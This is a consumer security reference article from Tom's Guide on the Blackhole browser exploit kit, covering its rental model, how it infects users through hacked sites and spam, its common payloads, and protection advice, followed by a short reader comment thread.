Blackhole Exploit Kit: Popular Malware Among Cybercriminals

Reference
By , published

The Blackhole Exploit Kit is a malicious code that can be illegally injected on legitimate but hacked websites.

The Blackhole exploit kit is a collection of malicious code that exists on fraudulent websites, or can be illegally injected onto legitimate, but hacked, websites. These pieces of code are designed to detect and exploit vulnerabilities in Web browsers and create security risks for PCs.

In 2011, Blackhole was the most popular browser exploit kit among cybercriminals, according to Trend Micro, an Internet security company. As of Oct. 22, 2013, of all online malware, the Blackhole exploit kit was ranked 60th in the world, affecting users in 212 countries and more than 18,000 websites, according to AVG Threat Labs.

The exploit kit was developed in the underground cybermarket, and had been difficult for authorities to track down. However, the hacker who created and managed Blackhole was arrested in early October 2013, which may have somewhat reduced the threat.

Exploit kits are bundles of software designed to commit crimes, or crimeware. They enable criminals to package and distribute many different pieces of malware, and also manage the networks created by some of that malware.

Kits that focus on infecting users through Web attacks are known as browser exploit kits or browser exploit packs. Browser exploit kits allow attackers to take advantage of vulnerabilities in Web browsers by using many different forms of malware, greatly increasing the chances that something will get through and infect computers.

Blackhole, the most common of the browser exploit kits, includes a rental strategy, where individuals/criminals pay for the use and maintenance of the hosted exploit kit for a specific period of time. The first release of Blackhole charged up to $1,500 per year for a license.

The Blackhole exploit kit is a favorite of online criminals because of the high amount of traffic that is redirected to it, traffic that is fundamental to an exploit kit’s success. Blackhole is also good at evading detection, which is a huge selling point. A kit will fail if it is easily blocked through content URL filtering, IDS, or content detection.

Most importantly, the business model is ideal. The kits are competitively priced and offer a sound business model, and actively updated exploit kits such as Blackhole contain the latest malware proven to work against top Web browsers.

The Blackhole exploit kit works by infecting pages served by legitimate websites and servers, compromising them with malicious code. When users browse these pages, the code (often malicious JavaScript) silently loads content from the original exploit site.

Criminals using the Blackhole exploit kit also use spam email, tempting users to click on embedded Web links by pretending to be a reputable site or user, like LinkedIn, the U.S. Postal Service, US Airways, Facebook and Paypal. The embedded links open compromised websites in Web browsers.

A white paper by Trend Micro describes a typical email-based attack:

  1. Spam arrives in a user's inbox.
  2. A link embedded in the email leads to a compromised website.
  3. A page on the compromised website redirects the user to a page on a malicious website.
  4. The page attempts to exploit various software vulnerabilities in the user's system.
  5. If one of the attempts works — because the user's computer has not been updated with the latest security patches, for example — a malware variant is downloaded, infecting the user's computer.

Blackhole targets many browser vulnerabilities, especially among plug-ins that provide browser support for Adobe Reader, Adobe Flash and Java — all of which are commonly used on business and consumer PCs.

After a computer has been compromised, the code delivers the “payload,” which is the purpose of the exploit. Some common payloads include fake anti-virus software, the ZeuS banking Trojan, the TDSS and ZeroAcess rootkits and many forms of ransomware.

If a pop-up warning comes up when surfing a site, it’s likely that your computer's anti-virus software was able to block the malware, and your PC is probably safe. But there are a number of other ways to keep your computer and data safe from the Blackhole exploit kit.

It’s important to keep your operating system up to date, as well as all of the other software and applications on your PC. Never accept downloads from unknown sources or click on emails from unfamiliar sources.

Anti-virus software can offer fairly complete protection from the Blackhole exploit kit, as well as other exploit kits and types of malware. This software must be kept up to date in order to keep the user safe from newer malware, as hackers are constantly coming up with new code and malware.

After a threat is detected, it’s best to perform a full device scan with updated anti-virus definitions. Tom's Guide sister site TopTenReviews has compared anti-virus software and recommends Bitdefender, Kaspersky and Norton, among others.

The impact of the recent arrest of the hacker behind the Blackhole exploit kit remains to be seen. It's not clear whether Blackhole will disappear, be taken over by other developers or be replaced by other exploit kits.

Tom's Guide Staff
Tom's Guide Staff

Tom's Guide upgrades your life by helping you decide what products to buy, finding the best deals and showing you how to get the most out of them and solving problems as they arise. Tom's Guide is here to help you accomplish your goals, find great products without the hassle, get the best deals, discover things others don’t want you to know and save time when problems arise. Visit the About Tom's Guide page for more information and to find out how we test products.

Latest in Malware & Adware
Green skull on smartphone screen.
Malicious Android apps with 60 million installs bombarding phones with ads and phishing attacks — how to stay safe
Malware
Dangerous new password-stealing trojan automatically reinstalls itself on infected PCs
An FBI agent typing on a computer
FBI issues warning to millions of Americans to avoid these websites that can steal your passwords and banking info
A hacker typing quickly on a keyboard
New MassJacker malware is hijacking digital wallets to steal large sums from users
A person trying to set up a new Wi-Fi router
Thousands of TP-Link routers have been infected by a botnet to spread malware
A smartphone screen displaying the Android name and logo next to a sign reading 'MALWARE'.
Fake Google Play Store pages are spreading Trojan malware that can steal your financial data
Latest in References
Attractive heavy woman sitting on a bed smiling at the camera
Your mattress' weight limit might be the reason you can't sleep — here's why
Zoma Boost mattress
What is graphite in a mattress and does your cooling mattress need it?
The Saatva Classic mattress photographed in a stylish white pool room with an indoor river
Do you need a discount code to get the cheapest prices on Saatva mattresses? No and here's why
A mattress placed on a wooden floor with a Tom's Guide Sleep Week 2025 logo in the top left corner
Ditching the bed this World Sleep Day? 3 things you need before putting your mattress on the floor
A woman lies in bed with her hands covering her face, looking upset due to sleep deprivation. A Tom's Guide Sleep Week 2025 graphic, bottom left
Long-term sleep deprivation has serious health risks — but they can be reversed, says expert
Project Astra AI agent
Project Astra — everything you need to know about Google's next-gen smart glasses and new AI assistant
More about malware and adware
Green skull on smartphone screen.

Malicious Android apps with 60 million installs bombarding phones with ads and phishing attacks — how to stay safe
Malware

Dangerous new password-stealing trojan automatically reinstalls itself on infected PCs
Robert Pattinson in "Mickey 17" movie (2025)

5 top new movies to stream this week on Netflix, Prime Video and Disney Plus (March 25-31)
See more latest
2 Comments Comment from the forums
  • meowmix44
    lol... I bet theirs a new kit out as I type.
    Reply
  • Darkk
    The biggest threat is the ads on various websites that are linked to malicious websites. If the OS, Java, Flash..etc aren't updated it can take advantage of the exploit without the user even doing anything other than surf the websites normally.
    Reply
Most Popular
Attractive heavy woman sitting on a bed smiling at the camera
Your mattress' weight limit might be the reason you can't sleep — here's why
Woman sleeping on her side
How long does it take you to fall asleep? Expert explains 'sleep latency' and what it says about your health
Woman placing her hand over a white pillow
How we test pillows: A guide to our review process
The Saatva Classic mattress photographed in a stylish white pool room with an indoor river
Do you need a discount code to get the cheapest prices on Saatva mattresses? No and here's why
Zoma Boost mattress
What is graphite in a mattress and does your cooling mattress need it?
A mattress placed on a wooden floor with a Tom's Guide Sleep Week 2025 logo in the top left corner
Ditching the bed this World Sleep Day? 3 things you need before putting your mattress on the floor
A woman lies in bed with her hands covering her face, looking upset due to sleep deprivation. A Tom's Guide Sleep Week 2025 graphic, bottom left
Long-term sleep deprivation has serious health risks — but they can be reversed, says expert
Project Astra AI agent
Project Astra — everything you need to know about Google's next-gen smart glasses and new AI assistant
Two people place a covered mattress in a van to move it to a new house
Which mattress brands offer old mattress removal?
Blonde woman laying on Brooklyn Bedding CopperFlex mattress in bedroom with wooden floor, wooden bed base and two bedside tables
What is copper in a mattress and does your cooling mattress need it?